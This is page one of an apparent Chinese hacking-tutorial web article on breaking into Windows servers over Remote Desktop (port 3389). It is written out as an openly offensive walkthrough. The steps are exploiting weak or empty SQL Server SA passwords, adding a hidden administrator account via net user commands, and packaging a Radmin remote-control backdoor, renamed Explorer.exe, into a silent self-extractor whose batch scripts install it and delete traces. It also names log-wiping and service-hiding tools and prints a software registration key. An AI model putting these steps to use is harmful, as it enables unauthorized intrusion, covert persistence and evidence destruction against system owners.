黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 黑客入侵 >> 正文
·没有路由密码权限时的鸽08-23·高手解析如何入侵338911-09
·安全防病毒常识 教你识别11-09·让MP3设备远离病毒 教你11-09
·个人电脑中毒紧急处理措11-09·dedecms gbk版0day11-09
·快速扫清系统中的木马11-09·175站长联盟免费提供5G美11-09
·避免QQ聊天时受到攻击11-08·Windows系统中写入缓存失11-08
·08站长站提供100M/ftp免11-08·卡饭数据提供400M免费全11-08
·Windows 7 演变中的故障11-08·嘉英网提供50M~1G免费全11-08
·PHP168下载任意文件漏洞11-07·完美版脚本傻瓜式入侵11-07
·Sql2005注入辅助脚本[修11-07·XT Host提供30M/FTP免费11-07
·用Runas命令从容变换您的11-06·“内存不能read”的解决11-06
·仅需10MB资源 轻松将Vis11-06·超极速网络提供美国1g免11-06
·社会工程学在网络攻击中11-06·跳板攻击入侵技术实例解11-06
·巧妙运用NoScript阻止脚11-05·借用ADDS搞定Vista磁盘分11-05
·轻松把秘密密码藏到图片11-05·EATJ提供50M免费php空间11-05
[推荐]高手解析如何入侵3389
        ★★★★

高手解析如何入侵3389

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-11-9 12:24:12
这是本人多年下来的经验。

     工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隐藏3389服务及  不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务的);psu.exe(使用被禁止的Guest帐户要用到的);mstsc.exe(远程桌面连接程序)。 

一.扫到SA弱口令(自动攻击器) 

二.用SQLTOOLS连上去建一个用户

net start telnet
开telnet服务
net user mint mint /add
添加用户mint密码为
mint net localgroup administrators mint /add
将帐号mint升级为管理员 

三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)

制作RAD.EXE过程:

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe;

2、在本地设置服务端(一定要生成);

设置密码-->>设置连接端口(默认4489)-->>生成

3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg;

4、编写一个批处理,并命名为u.bat;

@echo offnet stop r_server

5、写第二个批处理,r.bat,内容为:

@echo off@Explorer.exe /
uninstall /silence@Explorer.exe /install /
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall /
silence@Explorer.exe /install /silence@regedit /
s 1.reg@net start r_server@del
rad.exe@del 1.reg@del r.bat@del u.bat

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包;

7、将Rad.rar制作成自解压文件;

选择Default.sfx的自释放模块-->>高级自释放选项

-->>常规

释放路径:%systemroot%\\system32

安装程序:释放后运行:r.bat 释放前运行u.bat

-->>摸式

缄默模式:全部隐藏 覆盖方式:覆盖所有文件

-->>确定-->>确定

生成完成。

[1] [2] [3] 下一页

文章录入:heilong916    责任编辑:heilong916 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体:
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886